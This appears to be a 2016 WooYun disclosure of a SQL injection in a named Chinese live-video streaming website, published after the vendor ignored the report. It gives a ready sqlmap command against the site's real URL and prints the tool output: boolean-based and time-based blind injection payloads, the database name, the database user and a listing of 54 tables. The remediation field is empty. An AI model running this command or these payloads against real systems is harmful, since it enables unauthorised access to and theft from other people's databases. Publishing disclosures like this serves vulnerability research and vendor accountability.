
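Vulnerability summary

Bug ID: wooyun-2016-0192961

Title: SQL injection vulnerability in a cloud live-video streaming platform

Vendor: 经常直播

Author: 绿箭侠

Submitted: 2016-04-06 09:30

Fix time: 2016-05-21 09:40

Disclosed: 2016-05-21 09:40

Vulnerability type: SQL injection

Severity: Medium

Self-assessed Rank: 6

Status: Unable to contact the vendor, or the vendor actively ignored the report

Source: http://www.wooyun.org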



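Vulnerability details

Disclosure status:

2016-04-06: Actively contacting the vendor and waiting for the vendor to claim the report; details not public
2016-05-21: The vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

The core team all come from well-known internet companies such as Tencent, with extensive experience and many achievements in internet product planning, cloud platform construction and streaming media technology. It has an absolute advantage and foresight in the domestic live-video technology field, and is regarded by the industry as the interactive live-video service with the most development potential.
A cloud live-video streaming platform has a SQL injection vulnerability.

Detailed description: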

python sqlmap.py -u "http://www.jingchang.tv/index.php?s=/Home/Index/new_show/id/21" --tables -D "cloud"

Proof of vulnerability:

sqlmap identified the following injection point(s) with a total of 102 HTTP(s) requests:
---
Parameter: s (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: s=/Home/Index/new_show/id/21) AND 8951=8951 AND (1886=1886
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: s=/Home/Index/new_show/id/21) AND (SELECT * FROM (SELECT(SLEEP(5)))XNqn) AND (3272=3272
---
back-end DBMS: MySQL 5.0.12
current database: 'cloud'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: s (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: s=/Home/Index/new_show/id/21) AND 8951=8951 AND (1886=1886
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: s=/Home/Index/new_show/id/21) AND (SELECT * FROM (SELECT(SLEEP(5)))XNqn) AND (3272=3272
---
back-end DBMS: MySQL >= 5.0.0
current user: 'cloud@localhost'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: s (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: s=/Home/Index/new_show/id/21) AND 8951=8951 AND (1886=1886
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: s=/Home/Index/new_show/id/21) AND (SELECT * FROM (SELECT(SLEEP(5)))XNqn) AND (3272=3272
---
back-end DBMS: MySQL 5
Database: cloud
[54 tables]
+-----------------------+
| jck_action |
| jck_action_log |
| jck_addons |
| jck_api_group |
| jck_api_record |
| jck_apidoc_log |
| jck_apidoc_main |
| jck_apidoc_params |
| jck_apidoc_return |
| jck_attachment |
| jck_attribute |
| jck_auth_extend |
| jck_auth_group |
| jck_auth_group_access |
| jck_auth_rule |
| jck_camera_category |
| jck_camera_channel |
| jck_camera_group |
| jck_camera_main |
| jck_camera_session |
| jck_camera_type |
| jck_category |
| jck_channel |
| jck_company_banner |
| jck_company_category |
| jck_company_document |
| jck_company_menu |
| jck_config |
| jck_device_camera |
| jck_device_main |
| jck_document |
| jck_document_article |
| jck_document_download |
| jck_file |
| jck_general_count |
| jck_general_nations |
| jck_general_provinces |
| jck_hooks |
| jck_menu |
| jck_model |
| jck_picture |
| jck_social_action |
| jck_social_discuz |
| jck_social_friends |
| jck_social_related |
| jck_store_auth |
| jck_ucenter_admin |
| jck_ucenter_app |
| jck_ucenter_member |
| jck_ucenter_setting |
| jck_url |
| jck_user_article |
| jck_user_main |
| jck_userdata |
+-----------------------+
sqlmap resumed the following injection point(s) from stored session:

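Remediation:

Copyright notice: when reposting, please credit the source 绿箭侠@乌云


Vulnerability response

Vendor response:

Unable to contact the vendor, or the vendor actively refused

Vulnerability Rank: 8 (WooYun rating)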